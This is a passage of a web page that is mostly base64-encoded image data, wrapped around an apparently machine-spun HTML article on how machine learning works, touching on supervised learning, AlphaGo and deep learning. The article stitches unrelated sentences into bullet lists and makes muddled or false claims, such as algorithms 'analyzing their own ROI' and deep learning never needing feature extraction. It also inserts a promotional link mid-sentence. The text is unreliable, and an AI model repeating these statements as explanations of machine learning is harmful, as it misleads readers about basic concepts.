/5FMhx5bzaW3El2x3R3rRKjEnTsZ4dPmo\/EAOIProiqzjGatkxdn9A9tudvvEBi52uYzLiSkB1l5lYWhxBGwQR2IqqrkT4FfG9J4yyCBgGYXl244XeiBDedd63LesnRCvkUk+8O2xpQrrjFlR5sZqXFeQ6y8hLja0HYUkjYIPyIrklHaaJn1pSlVJFKUoBSlKA\/KvStV+VPDXyznuT5PKN\/tE+DdrjFm2uVPv1yZVbWGlNKMRMJoGMobbUQ4QSSrZG+42qrzQ+QrDPp4ahbZ9D0+y+1tT2PlebS1uddV5NP8AlfJrhpo16n8H8ku84xORLHKsNhgi4NyLjMt1ymtyLpEQ10ezyYRSY7izpI87qB0kHWwALXwh4Ysx4TyW35fZ77bpEu6OS4+VxHZTq2XoynluxnIpLe0uN9QBQQlKutfffc7M6HyFND5Cs\/gsW5T8U7+rr+jtftN2g8D01rZKKi1XVRuk78t1rwTSqqI1zbDM4Vntt5GwE2SRPYtrlolQ7u6600plTgcS42ttCylYVvY6dKHxGqjRzw0529jNsckXu1nILVkN0vAbhXCZAjSGpn2kB9kB5lQGj7oUPVJ2CTWyte11nz5A8fgvKbXhUUWgWpvJ4+SsZK4iTdZsuNIcaSWwhcl4KeJLZ+10eoHbVUWbcDZ\/f8ul5pBmwVSb\/b4se6xG8juVuZjvtIKSptUYAvtkKOkuJSRrsR1HWwtKAijFOG5GKZg7d4HsCLYjDoeNxGw44p1t1p15ajtYJ8shxOj1FXY7HbvbrfwrkcTH+JrS5JtJdwS4iZcSla+l1PkPIPk+5tR63En3un0J3upopQEO3jh7Jrhcshlx5tsQ3d8ys+RMhTiwUx4rcZLiVaR\/vCWF9IGwdjah31TXvhTJ7lxtlOHx5dpRPvmUrvkd1TjgbSyZjbwCyEdQX0II0ARvQ3rvU10oDXC\/+GjJJuWZA5Gmx52PZPc1XGU2\/kNyhqZDnT5rZisHyX\/s9lKKT3AOwBV9mcNZ0OXIOZ4\/Is9jt7M1pybLg3GWiRcIbbfQI8iIQWHVHSR5pUDpI+IAqcqUBB3ihlyUWuwMYjIdazti4Jk46G4rjnWtX8l1KlpSUpT0OknqIHug\/wBNVyuHchw+HhE7jd60ybjh9ukW1ce7OONMzEPhsuueYhK1Ic62+rfSd9RB+dTEQD6gV7QEAp4M5Btgg5narnYH8vayqTk8qI8p1q2qL8b2ZbDa0pLg02AQso2pW9gfD7N8JZ9cFSpmRzsfelTs3g5Q8hhbvlJjssBCmgFI2VgjSd9iBslJOhPFKAxbkrGZeX4TcMch220T3JiUpMa7FxMZxIUCQpTXvoPbstPdJ0R6VEtn4V5ZsuOWh9i\/WqVeceyRd4tdvn3GVKiMRFsFlUX2paC8eylqBKDokD071sHSgNfHeCeSbi5esluN3x1vInsrhZVbW2i8uEVsRQyWHwpAUE6KgFJ2eyVaB90ZPkuD8r5lZLXc7q5isLJcfvbV5tsZhx92C50NLbLTzikBZKg4o9SUe6QOxqXKUBB2f8U8m8j2yyXi9P2WFkFinvyGYlsu02JHcjutpQpsymgl4L7b6gjX9JBHerW\/4eb01gYtEWxWCXd5l2cu04y8guZU2+Ww2h1icep9LgSlIJ6QlXoRr12FpQGvmV8H8m3vC8XtDlys10yKywnGFX9+6zYU6K8pWwtp9lJU8hI6QUuAdfQFHuamHFYuawFqgZLMt82HGgw2o8xorEmRJCCJC3UkdCQVBJT0k+qt60KyKlAKUpQCok8T\/CUPnziG84G8lAmqb9ptrqv+HKQD0d\/gDspP4KqW68IB9RUxk4vciGlJUz+ZDkvFch48zC44xfob0Kdb31svMuAhSVAkelY0i\/TmgQ1IcSD+NdyPHX4B7B4jba5muGR2YGaxW+6gAlM5IHYK+HX+J0D6Ej1riryPxRm\/FWQzMZzSxSbfNhOll1LjZT0qA3o77g676Pw0R2INdc9RKXegymyPRmLSp8qYeqQ+tZHYdR3oVT16RqvK5ZScnbNEq4RlHHWIuZvlkGyKUUR1KL0pwf0MI7rP56Gh+JFSRycxe8wya14JiUB2QuQUsRYkdGyUJPSkaHw2D\/07r6eHOzrTasgyPo95RagMq\/P31\/8A+P8AWt6\/CLwXbbSZPK11YQ9c7olLMFZGzHipQEqCfkVr8zevh+Zr0dNg346fj\/By5suxmIcDfR4YvbLHGuXLc5+XcHwFrgQ1hLbW+\/SpzRKj8wO34n1qIvHV4e8Q4nkQ7\/iNrNus81oMIR5iljz072AVEnZHSf8AX5V1Hh2wJaQdJ7+lccfHDzjcOZOZLixFnKXjWOPvW2ztoXttQQrpdfA9CVqT6\/4Up+VdGpcMENtehz6dSyy3EB2q8z7JMbn2x\/ypLDqHWnAASlaFBSSNj5gVsjx\/49uYMelsx719TXOMSAsvxlMkj8VNenb4hBqEOOcHcy27I9pQpMBpQDqvTqJ9E7\/9\/wAKvnLvGsfDfZp9rQ2IzvuOBt3zAlXwO\/Ub9O\/yquPsjWS0T18V3F\/780vI0l2hp1qVpG+8\/wAr5nTbgnxS4dzNbEvW5S4FybSBIgPHZQvR30L0AoaBI9Dr4dq98UvGVg534xlWB9UZq8QEqlWeUsAFqQB9gq9QhfZKv7HR0K5hcM8g3DDMqiGM4ttLjqQFNHpc31AhIP4kDW9gK0fmDlXNnPfNU7Jrnjd0zeQ3Bb9xpNuBitSI60hTbmh73voUkkEnW9V5\/vFt5R1bWnwRbapc6w3Ny0SEKYfbkpTsq0WH0K1v\/wBwa7hfRp+IF3lviBWKXmaXrti\/SyOpW1mOdgA\/8qgU\/l01wyt5LTTcuYyoxXHwkvhIK0LGidH5996PrW7n0YfJzmHeJ4WFuV\/sF\/ffgLTvQUlzakH\/AK0oNYrvRo0o7b0pSqAUpSgFK8JA9adST8RQHtK\/PWn\/ABCv1QClKUApSlAKUpQClebA9TX4TIYW8uOh9tTrQBWgKBUkH02PhugPpSlKAUpSgFK8JA9aevcUB7SlKAUpSgFKUoBSlKAUpSgFKUoBSvAQfQ17QCo65a8P3E3N9sVbeR8Ri3MlstIk925DafXSXE6VoHvo7G\/hUi0onXQdTmNyp9Czj11mOzuKuVHrY2tRUmHd4YdCfw81rp7f5P8AWoRuX0MHiRjuqTbMwwmW2D2UuW+0T\/YtGu09Km2+oOJF38NWceFa2xuPc\/lWqTcp7qrt5lvdW415SwG0jqUlJJBaV8PiK298Lt8RcuMY9r2lT1skLQob7+WolSTr5d1D+1PpMMfeavGKZWlJ8l2G9BUr5KQvrA\/uHD\/pWs3DHLk\/j6\/IntK8yI6nyJTB9Ft732\/EHuK93Rv\/AKlRw543Lk6ETVPDFr07D7zEW+QqOPj5gbV06\/Heq\/n4vZ2qGVkncRBUSO5USon8++670Ynm1qyS1RrzZZzb8d1I7A90k\/0qHwIrkv4uvD5c+MM8u6Lbb1iyuSXp9pcSCU+xOrK\/K\/5mlKUn8U\/lXLr4ydSLaWSVxKDirLuOMfhwo0i7sNpQ31uB1shRe7E77j8vWsjz\/IMTzaymM1cYfT7KpDh9oK+g72nupRPb17fjWqxJBI+VehawCAT3r28PtbkhhWCeGLiltpWuKo8vL2BCeR5Y5Gm3fg+bsqGAtqe2IyypxDw8tSd7JB7EVnfO3ljNGkoQEFNvjJUn4jSSAP8ATWvw1Vm4+tTEu+NXK5PJYhQP9pedUN9ISR318dfL4nQ+Iq2ZfkC8nyKZeVNqbQ8sBltStltpICUJJ+JCQAT8Tuvk26j8z3y3xX3g2uODttQClI+eu+\/z9anTwVT5I8TeGuRAoOPXeOUgdyP5g7VA7zIYDZDyVKUnqUE\/0\/gT+X\/vW1f0Y2Eycz8W2KKaZUti0KcuUhQGwhDSCoE\/mrpH+YVVdSTvsneu9fqlKgClKUBZ8qxuPllmdskubMisvLbWpyI8WnPcWFAdWvQlI2PiNitcbzCuePchZFwBic+4MKy61WduLMU4pbkWG0081NkFf+MoQgdXqVubraaqI2W0m6\/XptsX6y8j2b2zyU+f5PV1eX166ujq79O9b70Bqdg2dZJdOJ08oPJcYg8eY39VWZL4J9uvq2\/JU6sH7SG1KbaT8ypypLuOY53abw3hOUcm2awy4tiTfp90cgNhKytamwwyha+kpbLSlKUdqPWkdt1L4xfGxaRYRYLcLalYdEMRW\/JCwvrCujXTsLAVvXr39a\/F5xHFsjfiysgxy2XN6CrrjOTIjbymVfNBUCUnsPT5UBDdg5C5SzRzG7cu7RMZcViki+3yQqAHlJJeDcdSELI6OtCVuaO9AkeoFY\/YefMnvFnxxjLs2tOGvSMUayGROeiIWu4uuuLS22w0s6ICEJUpKdqJWAnXrWxrlks7r0iS5bIq3ZbIjSFqZSVPMjem1nW1JHUr3T294\/OsKyzhq25Y+zGdyS62+yNxBB+qITcZthDIT0FDS\/KLjIUj3VdCh2AA1qgLCjlTKcf8OEblbIWI8m9PW1iUpAR5bKHJDiUNlQHo2jzEqUfXpSTWKXTlfNMauGUNM8jWfJ41gxB68PuxobSEx561pSwgqQojy9BagD313J1qp\/RZrWi0IsIgsqtyI4iCMpAU2WQnp6Ck9inp7a+VY7ZeKsKx+53WfbbQw0xd4bEB23pjtJhtsN9ZCENJQBpRdWVb3sn4UBGWY863ixzbk7jlwt96iY7irMu4FooUg3OS+22x1rB0hASHVkbHbXcetUVv5T5Ubh5Q9GuNumojWxr6uk3n2KCEXZa9CPpl9aShTZCkhagSRrZB3U3W\/CMNtMN+3WrFbRDiymRHfYjwWm23Wh1aQpKUgKSOtXY9vePzNfhrAsIYsbmMMYhZW7O8rqct6IDQjLV8y2E9JPYd9fCgNfnsruvIyOP4cnkCdCS7lEuRIfmwY0dbLkBgqDfuKU06A8BogkEK7901cWOTbwnJJaYEizWV7L8um2Rq\/wAmMgBuJbYwSVq2QHXVuIWhAUdAb9daqcncHw1+BBtb2K2hyHbFh2FHVBaLcZY9FNpKdII+YAr9TMKw+42j+H5+LWiTa\/NU\/wCxOwmlseapRUV+WU9PUVKUSdbJJPxoCF7XydyBep9pw2yZZAmP3HJpkOLfxASW5lrixet9xLYV0lSHloa6knpJST8dV85\/K+e2rA1yX8ghypcfIblCdlNIjMzX7bEWpC3mGHlpbW4lYSFDetd6nVnHrDHdhPx7NCbdtzKo8NaI6AqM0rXUhsge4k9KdgaB6R8hVFPwPCbrEYgXPEbLLixnlSGWX4DTjbTqj1KWlJToKJ7kjuTQGEZZyfOxfhSFnkKcmY\/ORAbbuE6L5DbKZLraPaX20n3EoS51EA6OgNje6j6bzllNiXk7lpzODl9tt31VAh3FiGyltEyW8pLilLStLa0tpSOn3kgqUElW9mp4y3F3Mmsa7NDvs2zElJD0NDKiUj\/hqQ6hSFII7FOvT4irZjHFmM47Z7haJSHL0LwtK7k5c0NOe1FKAhKVISgNhCUpSlKEpAAH96AhPKcwz3I+L8ztNyv7rESZMttlt90faisvBcp0NSW3Aw4tCAgKQQrYOlnfpupN5HyW9cb8OfxNZr21cFWUwXHpamUFL8P2htLpAT7o\/lKUdj5brN04ZiKLArFUYxaU2ZQ0q3phtiMRvf8Au9dPr39KqXrBZJFoNgftMNy1qaDBhLYQpgtDt0eWR09OvhrVAQBA5w5JveXzMVgxYzb+WJiTMRT5GzFthedbflyCfX3GC6B83Wk\/E1Wr5Y5ARbchzL69tjNmOULxazJfhgNtdMhEdU193qG0BaHSE9gSoAkdqnNixWWNOaubFphtzGY3sbUhLCA4hjYPlJUBsI2AekHXb0r5HFsbNodx82G3m1vFZcheyt+QsrUVr23rpO1EqOx3JJPegIOuHJ3ItuhZhZLJlduyKTGkWi22W8iIhDSbhMe8tyOsIJQvywUK7dwFgGvnknLnIGDXnLbHcslts6PAm2KA3d5EAMM2t2epXmrdSlRCm22wlQ2od1JBPfdTnExPGIFujWiDj1tjQYTqX40ZqI2hplxJ2laEAaSoHuCBvdWzKsDi5BAlxrXcnrDJnPJelSoMaOpUopT0hLyXW1JcT06Hcb7Dv2oDDeHs4vmWZhl1rOaQ8nsdhTDYi3CPFQ35r7iFOOe8g9KwAUgFPbWvj3OKL55nXjkDHU4rfpD1lvF4ehqYkQ4iGTEjtue0OpUHjIBStrYUptKdHXyJmHBcCs+BW+TEtr0mVInyDKmzJSkl6Q70pQFK6UpSAEoSkJSkJASABX1j8f4LEmPXGLh1kZlSFuOPPt29lLji1pKVqUoJ2SpKlAk+oUd+poCIML5H5JuSeP8AKb1ksH6vzR+a+5bDBS2I1uS06826Xd76kgMgn00v+5o7dy9nFxt2dupyBP1xY7HKvUKMxFjSLeuOlSyw4zIbWpSupLZBS4AdkkDtU9N47YWRBSzZoLYtjKo8IIjoAjNFISW29D3ElKUghOhoAfCqa14ViFjiy4Vkxe02+PcN+1tRYTTSJGwQfMSlICtgkd9+tAQHH8ROZ3fI32bTEjiBk9uSxhTa2trmzEOoaekK\/wDlArcWB\/8ADYKvjX1PMfI90yaXa7HIcL1ov4sDcRcaGlqd5LiUPuOLW8HUqWA4tIQ3oJ6ftbqfWcXxuM9AkR7Db23bU0WIC0RWwqI2U9JQ0QP5aSO2k6Gu1fgYhiqb6vKE43axeVp6FXAQ2\/aSnWtebrq1rt60BDrnIfJ0jEMjzSBkNjAeu8q2Y5AfQ0x5rbcjy\/M81xYS44UtulCPdB7bJ9BmfFuZxM0w6KZmUvy5l2TL8pEthmLMDbThZc020pSVBCxrzEkpOx8xWWysNxKdZhjk3GbVItSTsQXYbao4Oydhsp6Qdkn09TX3iY3YIDkV6DZoUdcJgxYymo6EFlkkEtoIHuo2B7o7dhQFuwrBbJgdvet9lVLWh90OrVJkLeV7qEtpAKj2AQhI\/ts9zWR0pQClKUApSlAQP4zeK5PKPC1zYtUfzrpZf+8oiAPeWEA+YgfiUb0PiQBXHl65rtc5xl0KSEq7dXzHwrv042HEKQpIUlQ0QfQiuTH0gXhdufFeSP8AIWJwlu4peXyv+W3sQpCtlTSteiT3KT8u3qO\/oaHNtfu2Y5YKXJFPHHO1+wC4olWu4lCFHTrKjtt0D0Cge3z0fUVe\/FD4ncUzHi9EWLaGpt0ckIUY8lrrREKftKCviFDQ+B79\/QVqZMvsiMtQdcV2Ohs60axG9X+RLSpPVoE6KSd106jUx2uPiZY8NSsrJkjA751SENTLHJUR1NAe0Rzs9yDsLT8e2lfnVsRHskN4vpkO3BpoAlKWihJJ9AVEggfjqrLvvuv0l1aUqSk6Cho\/iN7\/APtXj2dZcrje5MmOYEZXkQioL8hHZJV8Cf8AER8Cf\/SrXSlLsDZPauwH0N3A8vGsKyDm+9wC0\/kKhbbWpadExUKCnFj8CtKR\/kNc\/PB14Vsu8UPJ8PHrZGcZsMBxEi9XBST5bDAPdIPoVq9APj+WzX9COF4jYcCxW1YdjEFEO12iK3EisoGglCRof3PqT8SSaAvVKUqAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQFG7d7UzKMF25RUSQEksqeSF6UdJ90nfc9h86weDzCm831UDH8ByW6Wlqd9WvXuO0yIqXwvoWUhbiXFtoVsKWlJA6VeuqyafgmGXK7Iv9wxS0ybmy8iQ3LdhtqeS6gAIUFkdWxoaO+2h8qjl7ijkuHaHsFx3NLbBxp64+3NyksvIucVsyhIWwhSFhCgT1I6jo9KiCD8QJDTyDhCo86WnLLSWbYoomue2N9MdQWUELO\/dPWlSdH4givw5yRgTVsj3pzMLOmBLcLLEkzG\/LdcHqlJ33I+I+FR1ceAZkzj93GY95ZiXROTyMkblR1ONJdWqS64htxSCF9kOBPUDsFKSN61WPTeMLlxs9Z8vZnSXr6l6eiUUW6Xe2FpkpZBKgV+aleo7YC+wO1AgA7oCZZfJOBQLbDvE7MbMxBuHV7JJcmtpbf6TpXQonStH116V9ZXIGEwZK4czK7Sw+3G9sU2uY2FCP0lXm63vo6UqPV6aBqH8D4gzi0Yxi16tptMe8R7C9aJkC9Riptpp2Qp9K0ho6Q4OvSkj3VaA2OkGsixriCDgLN6uF4ULxCcxmHZuhqKVyVtx0PeaEpG9hfmDSBv018qAlFi82uVPNsj3CO5LSwiUplLoKwyokJWU+vSSCAfQ6NVtRL4d8RyKyYzIv+YKkKu10UiO0mS30PNW+MnyYqVpOylSkJLih\/idO9HYqWqAUpSgFKUoBVryPG7Jllll47kdtj3C2zmy1IjPo6kOIPwI\/+9XSlAcmvF19Fxldpdn5fwQ27e7WpSnl2gq\/2yOPXTfoHUj07e96dj61zXyrEckxC5vWfI7NMt8thRS41IZU2pJHzBAIr+owjfasE5I4I4f5dgOW\/kjjyy35twa8yTGT56f+V5OnE\/2UK0eRz\/eRVdD+ZMgj1FK7kZf9EJ4UchfckWVvJsfU4dhES5ea2n8g6lR\/9axq0fQv+HeFPEi55xmc+MDv2cPsM7\/zBBNUdeBJxebacecS002pa1nSUpBJJ+QFbd+Ff6Nnm3xAzo18yO2ScNw3qSpy53Fgoekp+IjsK0pXb+pQCfxPpXXjiDwSeGLg9SJWCcVWsXFGiLlcQZ0sH5pce6ij\/J0ipxQhDaQlCQkDsAKgEe8H8E8deH7B4eCcdWRuFCjoHnvKSC\/Ld13ddX6qUf8AQeg0KkSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBWEZ1lOV2PIsds2PRrQ63eXX0PrmuOpUw200pxbvuDRSAlKe\/8AU4n4Vm9Uku02yfIblTILLzzTTrCFrSCpLbnT5iQfgFdKd\/PQoCLLD4hLfIx2Lc77jtxjzprcV+NHZbSfaG5SHnWSj3zrTTJKuvp127dxV0zLlC7Wi1WC92eyeVAuyEPSpNxaeCYKVlAbQ8htKltlRXrrI6UlPfexWXysJxGdHEWXjsB5lPlaQtkEDy0FCNfkklI\/AkfGv3ccPxW7TolzuePQJUuAAIrzrCVLZAPUAkkdtEAj5EbFAYQ3z\/iXmLcft11Zt7b6GFXJxgCN7yy2F9ROwCsADts9SSBXk7n7HrfIdjPY5flOR2UrkBEZKvJcUwHktL97sopUgfIKWkEgmszTg2HJjSYYxq3+RNdQ\/Ia8hJQ44hYcSoj02FgKH496+r2H4tIuL92esMJcySlKXn1NArWE9Otn466U\/wDSPlQGA5LzeqztvLYxeYkwI13kzkvuNhTKYTTauwSo9XUt5pI1s+8R61dWORr3Mwe7XiDiMp6\/2Z4QXrapSU+bK6GlK6ClStoAdB0CVHpKddVZPNwvE7i4l2dj8F9aVOrCnGQTt0pLn\/UUJ38+kfKvpcMTxq6wH7XcrHCkxJL\/ALU6y60FJW9vfmEH+rYB369qAwiy8zR3bPEm3SAqUtXlGbIgJUhiKHZK2GupL3S4FFaCFICVFJB9RomstnMVoueO3bJPqG6RWLZamLwhEhLYXJYeQtTXQEqOiryyNK0feT86yP8AgTDPPiyP4YtvmQWRHjK9nTtlsb0lPbsB1K18tn519pmIY3OtUyyvWllMSfGTDfQ0C2VMpT0pTtOiOkHtr0+FAR\/duUMuxh9bV1tNouPsFvbcuLdufcCmJjgSGWlKUOhAW4sICSSrp\/mHQOqpk8y3q0zpzeX262MwrNInMz5MRx1aXEsMR3EqZCgN\/wAySGSD\/Ug+noJAVx9hDkifLcxe3LeuqVImrUyCZAVrq69\/a3oevyFV9uxuw2lMdFstMWKIra2mQ02E9CVkKUBr5kAn5mgMM455NVnkq3uQzBdhTrU9OUqMpSvKdRJLQb6j2UNBQ3obKFEdiNSLVsteNWSyyXZVrgIjuPNNsHpJ6Uttg9CEj0SBsnQ+JJq50ApSlAKUpQClKUApSlAK82PnVJdY0iVELUZ3y1lQPVsjt\/arLj78gz3m3Xlr6GzsFRI2CKAyXY+dNj51iMY3S8SnC3KUjp97XWQAN9h2qsNkvP3gf+tVAZFsfOmxWN2OTMMxy3vvqUOlQ2TspI+Rr1dwn2WWpuYtUhpYJQrfegMkpVktCrjcHjPkSClkk9DY9DV7oBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoDw+lYxYP\/wBTldv6V\/8A9qyf1qiiWiLDkLkMhXU5ve1b9TugLBj0yPDlO+0uhAUnQJ9Ng1fzerYP\/wB43\/rXyfx63Pul5TakqUdnpVrZr8fwzbfk5\/10Ba7Osu3h95jR6krKd9h6jVVzNhfkSVyrs6l0nslKSdCrhBtUS39RYRoq9STs1WUBZrba59tklLTyFxVH7KieoVeaUoD\/2Q==\" width=\"305px\" alt=\"how machine learning works\" \/><\/p>\n<p><p>The goal of supervised learning is to map input data with the output data. The supervised learning is based on supervision, and it is the  same as when a student learns things in the supervision of the teacher. The reason behind the need for machine learning is that it is capable of doing tasks that are too complex for a person to implement directly.<\/p>\n<\/p>\n<ul>\n<li>For example, a dataset for a supervised task might contain real estate data and price of each property.<\/li>\n<li>The result is a model that can be used in the future with different sets of data.<\/li>\n<li>Reinforcement learning algorithms are used for language processing, self-driving vehicles and game-playing AIs like Google\u2019s AlphaGo.<\/li>\n<li>In the case of a deep learning model, the feature extraction step is completely unnecessary.<\/li>\n<li>The more generic ones include situations where data used for training is not clean and contains a lot of noise or garbage values, or the size of it is simply too small.<\/li>\n<li>With time, these chatbots are expected to provide even more personalized experiences, such as offering legal advice on various matters, making critical business decisions, delivering personalized medical treatment, etc.<\/li>\n<\/ul>\n<p><p>Machine learning ethics is becoming a field of study and notably be integrated within machine learning engineering teams. \u201cMachine learning is the study of computer algorithms that improve automatically through experience and by the use of data. Machine learning algorithms build a model based on sample data, known as training data, in order to make predictions or decisions without being explicitly programmed to do so. If we talk about supervised versus unsupervised machine learning, unsupervised algorithms aren\u2019t capable of performing processing tasks of the same complexity as supervised. An unsupervised learning AI system can figure out on its own how to sort data, but it might also add undesired categories to the output.<\/p>\n<\/p>\n<p><h2>Providing Initial Input<\/h2>\n<\/p>\n<p><p>Machine learning algorithms recognize patterns and correlations, which means they are very good at analyzing their own ROI. For companies that invest in machine learning technologies, this feature allows for an almost immediate assessment of operational impact. Below is just a small sample of some of the growing areas of enterprise  machine learning applications. Perhaps the most famous demonstration of the efficacy of machine-learning systems is the 2016 triumph of the Google DeepMind AlphaGo AI over a human grandmaster in Go, a feat that wasn&#8217;t expected until 2026. Go is an ancient Chinese game whose complexity bamboozled computers for decades. Over the course of a game of Go, there are so many possible moves that searching through each of them in advance to identify the best play is too costly from a computational standpoint.<\/p>\n<\/p>\n<ul>\n<li>Supported algorithms in Python include classification, regression, clustering, and dimensionality reduction.<\/li>\n<li>The goal of a supervised machine learning algorithm is to predict something given a feature set of a phenomenon.<\/li>\n<li>To achieve deep learning, the system engages with multiple layers in the network, extracting increasingly higher-level outputs.<\/li>\n<li>Things like growing volumes and varieties of available data, computational processing that is cheaper and more powerful, and affordable data storage.<\/li>\n<li>Data science is the broad scientific study that focuses on making sense of data.<\/li>\n<li>You build a model of likely factors that might help identify what\u2019s a cat in images, colors, shapes and so on.<\/li>\n<\/ul>\n<p><p>Artificial intelligence, deep learning, and machine learning are deeply entrenched in our daily lives. These technologies might seem similar to some; indeed, they are interlinked although they have differences. It is a set of neural networks that tries to enact the workings of the human brain and learn from its experiences.<\/p>\n<\/p>\n<p><h2>How does reinforcement learning work?<\/h2>\n<\/p>\n<p><p>Computer vision systems will combine the machine learning approaches previously discussed with hardware like cameras, optical sensors, etc.. This approach does provide some limitations, including challenges with hardware and how <a href=\"https:\/\/metadialog.com\/\">metadialog.com<\/a> to convert images into helpful data structures for machine learning. However, the ultimate goal of MLand artificial intelligence for many researchers is to increase the usefulness of these systems across multiple domains.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='margin-left:auto;margin-right:auto' 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width=\"301px\" alt=\"how machine learning works\" \/><\/p>\n<p><p>Machine learning has developed based on the ability to use computers to probe the data for structure, even if we do not have a theory of what that structure looks like. The test for a machine learning model is a validation error on new data, not a theoretical test that proves a null hypothesis. Because machine learning often uses an iterative approach to learn from data, the learning can be easily automated.<\/p>\n<\/p>\n<p><h2>Machine Learning\u2019s Role Will Only Continue to Grow<\/h2>\n<\/p>\n<p><p>Machine learning can speed up one or more of these steps in this lengthy multi-step process. When AI research first started, researchers were trying to replicate human intelligence for specific tasks \u2014 like playing a game. You also hear executives saying they want to implement AI in their services. IBM Watson is a machine learning juggernaut, offering adaptability to most industries and the ability to build to huge scale across any cloud. The goal of BigML is to connect all of your company\u2019s data streams and internal processes to simplify collaboration and analysis results across the organization. In Layman\u2019s terms, Activation Functions deliver outputs based on the input.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='margin-left:auto;margin-right:auto' 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XKfUcKddCVFKQlK1qVxUo8T2UT3oXdvqO1ps7t9p7UOo9tkC\/zru6xcrXDmCU2zbIocdmTmXEhKltpjtFaOSUqytAUlJyKqLZkLXBxJUPVNWf1JuNuo3ubpvR+j7ZoybZdSxX7nEnSp8lLphx\/RvGOENKTzIkZRgkHAyRV4h2GKhrOwzgtXd9KankLTFi211UZMsulx15tLywpt4HkpK8KTlacZwrv5ds1M7tpZ6KxdpUKIWlIcacjKDg9VsJHiYGew+Vke36auCQPdXBxtLiChSAoKBBB9o91aR6HRcpybeZfwZHeZbLBamFa7uxDhXmNaX4USNBS4\/\/ANpQVPOBpRDowTjHvI5ev3HapVL0XrO4zVTvBmmDMLq2RGXHU6wtbylh711pCSUqR3TlQ4Y498VeR+3xpEJdvda\/kHGi0pA7DiRgjt9FfVhhDDKGW0cUNpCEp9wHYVm6ZavTJScHnOM58f8A4Yd7SjfJcW2GWPn6L17dNQNOS7GpuK9KQqYGXWWmnG0zWVA5S6Vr\/kkrUeQBySAO4FVRE0NcYd8fu0W3Fp9F+adYcS+Bi3hhtC045Y49lepjPbOPI1cziM+VRwMVtp3Ep7YMGlplOnLiy285\/wBHFHye9K5AUqw1k2P0NKZ86DzofOgOK+nT5OMs+hLTO1+ontSzNY6btk262bwZMeRcAHG2WFAhRCF+oCFJzyxkZ8xWVat+dhLdNTZ\/4xtNNO54JQ3ITwH\/ALyfVH21qnYfloadix33EtyUpQ80lZCXAFApCgOxwQD39oq5tr6X9\/Lo801H20ubaHccXXlNttgHuCVFXlXA632atrq7ldXl1wKXJZS5Lfn\/AEj0PQu1N1aWkbWytVUcebw3nL+X9s2T6t29283UsAgalsVuvEGU2FsP8QpSUqGQ406nuk47gpPetZG\/G1a9nNzbjopMhx+IhKJMF5wDk5GcB459hIIUkn3pNbIdidDXjbDaaxaP1FcW5M23ML8dSFcm2ypRX4aSf5qQrHu7e7FYBdW+41l3N3om3bTshuVbrbEZtbElpWUSA2VqUtJHYjm4sAjsQAfbWj7EVbmnqNShSk5UUnl9OezXhk3\/AG7pWtTTaVzVio121t13W6fjgrP4I9rmdPbW7tm1HcpN7csibx+bVNoLSkjCnEggcj6nLHfzArt7g9IGn9C7RM7gOaruT11Cra3IhqQ2Gm3JLrLa09hn1fFyM+4VcfaffLbvTlo2n03dNZ2VEN\/TEq33hLktvjDdShtaEvgn1M8FpHLHcgVJteb3aI1nsnrBhzV1p\/Ok7WbT0OAZaA+qCzOjpacCM54+CyFZAxgGr32priulBuXDx88dHLGOXLYxo6VoUrV1MR4+BbZ6pJt8+byUvc+j3SsLe6x7Wo1fd3Id3sL92clKba8VC218QgDHHB+kVZ+ybWWy6dQKtnnLnKRAF\/k2b0tOPG8Npa0hePk5PD\/WssbxvBtU\/wBUWlNVM7iadXZ4mlJcR+aLg0WW3lO5DZVywFEd8edW1GmNrtMb+Qt4Y\/UDo26x5uq3Z7lvjvt847L6nFclLDpGEcgCeIz9FZVjrWoQjJXUpZdP4fhf+eX8uZiahothOUJWsY4VVKXxfgwvF8ixe9u3MDa7dK77f264yJse2rjpRIfCQtfiMocJIAx2KiPqFXg1d0Zuxdy9K7f6O1DMkN3u3PXK4TprSSIbLakAkJRjkSVgAZ7kjuBkj6dSGkNsNaau1Ju5Y+oHRslb7TL7FkjvNuyHlNNIR4aVpd7lRQSPV7fTV47\/ANSW1mn96tI3NGrrXcbNL09Itk2fBkpfRBeLrS2y7wJ4pPAj6wfIVVX1rUZ0KDs3JzUJceY\/iST6r64wU0ND06ncV43nDGDnHgxL8LbXj1258iyuquk\/RcvSeprxtJue7qO56Nccbu0F+OlI5Ng+IlCk4wocVY7KB4kZHnUun9KBd6d4O8embzNnXVdtbucu2LaSUBjB8Tw8DkSket3zkA1dG26k2t6fdJ7l3aDutYNVzdaSJD1phWyQh51CXA5wDgSpWMFw5UcD1fecVKLF1FWLbvSuxzcHUcOfFj22VbtUW9h9Lq47Tno+FONp7hSVJJGRnAUB5kViw1TWqkY92lKa4lhuKXFiOWuXisfUy5aXocJyVzFQ+HdJ5UcySjLn4PL+RYzqH2ns+y2p7VY7XeJdwZuFjYuy3JKUhSFOOOpKRxx2w2PP31Sm4ugLvtjqyRo6+yocidHZYfUuIpSmyl1tLicFSUnOFDPbzzWQHUtvizYt5LVq7ZXVdomNNaWZthkRCzLZb\/7Q8rwz5hJACPpAqi+ovqMuu7FzkWSzXEuaTIiussvQ0NvB9DQDhKscvllftx3rotHvtWr939pDMZRbk3s08+GPDp1Oa1ix0mg7hU54lGS4Ut01jo877+hY3v5VFCFuqDbaStZISlIGSSfICoAAefuq9PTNtc7rfVSL7OYJgWxwBsEdnX+xH1JBz+siug1XUKemWs7iryS\/noaDSdNq6peQtaXV8\/BeJkV0rbOq0xYW51yjgXGcQ9KJ78T3wj6gftJrK6JHEZlLaccQKkmlLI3bLe02GwnAGR9NVDXz3eXdS\/ryuKry5PJ9K2VlS063hbUVhRRGoUpWMZQqR6zv6rFbo6WsiRcZCIMdXudXkJ74IBJ7AnsCRnPlU+SnJ71yKQcZ9lAUpF0Nb4sVb0hoTZimlpQHiS22VA54IPYE5OVkFav5yj5V07JdEWy33dEaCZV2Drj\/AKMpxLbkt4NI4oBPZJwEI\/UlKvkqBqt+P0muhI0\/Z5VwZusmA05KjkKbcUnPFQBAVjy5DkrB8xk486EKKTyUdarPdr7cE3K72UWxBZdcbb5+J4D6zHV6pKUnIW0sntgk5yc4rv6UujdmD1hvDrUVxmQQwFrwk